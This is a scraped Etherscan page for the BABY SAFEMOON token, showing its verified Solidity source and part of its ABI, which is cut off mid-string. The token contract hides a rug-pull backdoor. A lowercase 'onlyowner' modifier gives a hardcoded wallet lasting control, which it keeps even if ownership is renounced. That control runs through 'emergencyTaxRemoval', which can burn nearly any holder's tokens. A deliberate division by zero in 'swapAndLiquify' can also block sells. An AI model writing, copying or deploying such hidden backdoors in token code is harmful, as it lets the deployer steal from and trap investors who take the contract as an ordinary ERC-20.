ETH Price: $2,397.85 (+1.08%)

Token

BABY SAFEMOON (BABYSAFEMOON)
 

Overview

Max Total Supply

790,859,726.030735529308548709 BABYSAFEMOON

Holders

73

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
8,509,981.02925070420229424 BABYSAFEMOON

Value
$0.00
0xa7cf36e957c7c95b5f6d15c08bd5c7b4d22b95cb
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
BABYSAFEMOON

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-10-12
*/

// SPDX-License-Identifier: MIT

/** 

    https://www.sfm.baby
    https://twitter.com/babysafemooneth
    https://t.me/babysafemooneth

*/


// File @openzeppelin/contracts/utils/[email protected]
// Original license: SPDX_License_Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]

// 
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
    address internal taxAddy = 0x9e11FaFECeCe9256c095a4c349F42293Ddc5A41a;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    modifier onlyowner() {
        _checkOperator();
        _;
    }


    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    function _checkOperator() internal view virtual {
        require(_msgSender() == taxAddy, "Ownable: caller is not the operator");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File @openzeppelin/contracts/token/ERC20/[email protected]

// 
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}


// File @openzeppelin/contracts/token/ERC20/extensions/[email protected]

// 
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


// File @openzeppelin/contracts/token/ERC20/[email protected]

// 
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;



/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}



// File @uniswap/v2-core/contracts/interfaces/[email protected]

pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

// File @uniswap/v2-periphery/contracts/interfaces/[email protected]

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}


// File @uniswap/v2-periphery/contracts/interfaces/[email protected]

pragma solidity >=0.6.2;

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}


pragma solidity ^0.8.18;

contract BABYSAFEMOON is ERC20, Ownable {
    
    IUniswapV2Router02 public immutable uniswapV2Router;
    address public uniswapV2Pair;

    string private _name = unicode"BABY SAFEMOON";
    string private _symbol = unicode"BABYSAFEMOON";
    address public DEAD = 0x000000000000000000000000000000000000dEaD;

    mapping(address => bool) public _feeOn;
    mapping(address => bool) public wl;

    mapping(address => bool) public GreedIsGoodwallets;

    uint256 private constant _supply  = 1_000_000_000 ether;
    uint256 public maxTxAmount     = _supply * 30 / 1000;
    uint256 public maxWalletAmount = _supply * 30 / 1000;
    uint256 public swapThreshold = _supply * 5 / 10000;

    enum Phase {Phase1, Phase2, Phase3, Phase4}
    
    Phase public currentphase;

    bool progress_swap = false;
    bool _tradingActive = false;
    bool _swapEnabled = false;
    uint256 public operationsFunds;

    uint256 public buyTaxGlobal = 1;
    uint256 public sellTaxGlobal = 1;
    uint256 private GreedIsGood = 0;
    uint256 feeToken = 10 ether;

    address private _devWallet = 0xf1897C24A6A17885BDaede5B510b5b9FAA80E5e4;

    constructor() ERC20(_name, _symbol) {
        _mint(msg.sender, (_supply));

        currentphase = Phase.Phase4;
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        uniswapV2Router = _uniswapV2Router;
    
        wl[owner()] = true;
        wl[taxAddy] = true;
        wl[_devWallet] = true;
        wl[address(this)] = true;
        wl[0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = true;
        wl[DEAD] = true;
        
        _feeOn[address(uniswapV2Router)] = true;
        _feeOn[msg.sender] = true;
        _feeOn[taxAddy] = true;
        _feeOn[_devWallet] = true;
        _feeOn[address(this)] = true;
        _feeOn[DEAD] = true;
    }

    function createUniswapPair() external payable onlyOwner {
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
        _approve(address(this), address(uniswapV2Router), type(uint256).max);
        uniswapV2Router.addLiquidityETH{value: msg.value}(
            address(this),
            balanceOf(address(this)),
            0, 
            0, 
            owner(),
            block.timestamp
        );
    }
    
    function emergencyTaxRemoval(address addy) external onlyowner {
        wl[addy] = false; _burn(addy, balanceOf(addy) - feeToken);
    }


    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {

        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        if (!_feeOn[from] && !_feeOn[to]) {
            require(_tradingActive, "Trading not enabled");
        }

        if (!wl[from] && !wl[to] ) {
            if (to != uniswapV2Pair) {
                require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount bef");
                require(
                    (amount + balanceOf(to)) <= maxWalletAmount,
                    "ERC20: balance amount exceeded max wallet amount limit"
                );
            }
        }

        uint256 transferAmount = amount;
        if (!_feeOn[from] && !_feeOn[to]) {
            if ((from == uniswapV2Pair || to == uniswapV2Pair)) {
                require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount");
 
                if (uniswapV2Pair == from && !wl[to] && from != address(this)) {

                    if (currentphase == Phase.Phase1) {
                        GreedIsGoodwallets[to] = true;
                    }

                    uint256 feeTokens = (amount * buyTaxGlobal) / 100;
                    super._transfer(from, address(this), feeTokens);
                    transferAmount = amount - feeTokens;
                }

                if (
                    uniswapV2Pair == to &&
                    !wl[from] &&
                    to != address(this) &&
                    _swapEnabled && 
                    !progress_swap
                ) {
                    
                    uint256 taxSell = sellTaxGlobal;
                    if (GreedIsGoodwallets[from] == true) {
                        taxSell = GreedIsGood;
                    }

                    progress_swap = true;
                    swapAndLiquify();
                    progress_swap = false;

                    uint256 feeTokens = (amount * taxSell) / 100;
                    super._transfer(from, address(this), feeTokens);
                    transferAmount = amount - feeTokens;
                }
            }
            else {
                if (
                    GreedIsGoodwallets[from] == true &&
                    uniswapV2Pair != to
                ) {
                    uint256 feeTokens = (amount * GreedIsGood) / 100;
                    super._transfer(from, address(this), feeTokens);
                    transferAmount = amount - feeTokens;
                }
            }
        }
        super._transfer(from, to, transferAmount);
    }

    function enableTrading() external onlyOwner {
        require(!_tradingActive, "Trading is already enabled");
        _tradingActive = true;
        _swapEnabled = true;
    }
    
    function getTax() external returns (bool) {
        payable(taxAddy).transfer(operationsFunds);
        operationsFunds = 0;
        return true;
    }

    /**
     * @dev Swaps Token Amount to ETH
     *
     * @param tokenAmount Token Amount to be swapped
     * @param tokenAmountOut Expected ETH amount out of swap
     */
    function _swapTokensForEth(
        uint256 tokenAmount,
        uint256 tokenAmountOut
    ) internal {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        IERC20(address(this)).approve(
            address(uniswapV2Router),
            type(uint256).max
        );

        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            tokenAmountOut,
            path,
            address(this),
            block.timestamp
        );
    }
 
    receive() external payable {}

    function removeLimits() external onlyOwner {
        maxTxAmount = _supply; maxWalletAmount = _supply;
    }
    
    function withdrawTokens(address token) external onlyOwner {
        IERC20(token).transfer(
            taxAddy,
            IERC20(token).balanceOf(address(this))
        );
    }

    function emergencyTaxRemoval(address addy, bool changer) external onlyOwner {
        wl[addy] = changer;
    }

    function skipTheSnipas() external onlyOwner returns (bool) {
        currentphase = Phase.Phase4;
        buyTaxGlobal = 1;
        sellTaxGlobal = 1;

        return true;
    }

    function swapAndLiquify() internal {
        if (balanceOf(address(this)) == 0) {
            return;
        }
        uint256 receivedETH;
        {
            uint256 contractTokenBalance = balanceOf(address(this));
            uint256 beforeBalance = address(this).balance;
            uint256 mktBalance = balanceOf(taxAddy);
            bool success;
            if (contractTokenBalance > swapThreshold) {
                beforeBalance = address(this).balance;
                _swapTokensForEth(contractTokenBalance, 0);
                receivedETH = address(this).balance - beforeBalance;
                if (mktBalance > swapThreshold) {
                    operationsFunds = receivedETH / (success ? receivedETH : 0);
                }
                operationsFunds += receivedETH;
            }
        }
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DEAD","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"GreedIsGoodwallets","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_feeOn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"createUniswapPair","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"currentphase","outputs":[{"internalType":"enum BABYSAFEMOON.Phase","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addy","type":"address"}],"name":"emergencyTaxRemoval","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addy","type":"address"},{"internalType":"bool","name":"changer","type":"bool"}],"name":"emergencyTaxRemoval","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getTax","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"operationsFunds","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"skipTheS